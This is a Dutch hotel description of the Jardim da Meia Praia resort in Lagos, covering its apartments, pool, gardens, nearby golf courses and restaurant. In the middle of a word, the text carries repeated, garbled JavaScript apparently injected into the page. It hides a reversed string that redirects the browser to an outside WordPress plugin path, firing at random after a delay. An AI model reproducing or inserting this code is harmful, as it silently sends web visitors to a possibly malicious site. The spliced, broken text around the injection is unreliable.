Dit 4-sterrenresort ligt in Lagos, op 2,5 km van het centrum en 2 km van het strand Meia Praia. Het biedt weelderige, aangelegde tuinen, een groot buitenzwembad en gratis WiFi.

Het Jardim da Meia Praia biedt elegant ingerichte huizen en appartementen. Ze hebben allemaal een volledig uitgeruste keuken en een eigen terras. Sommige appartementen zijn voorzien van airconditioning en een jacuzzi. Zoals de meeste locaties, bevindt zich ook Jardim da Meia Praia temidden van vele schitterende golfbanen zoals Onriya Palmares en Boavista en het iets verder gelegen Parque da Floresta.

Gasten kunnen ontspannen in een ligstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toel op het terras bij het buitenzwembad. Er is ook een tennisbaan beschikbaar.

De aangelegde tuinen omvatten een beek en een schitterend “Japanse” brug.

Het resort heeft een uitstekend seizoensgebonden restaurant, Restaurant Destino, dat een brede selectie van Mediterane gerechten en dagschotels serveert, bereid met uitsluitend verse ingrediënten.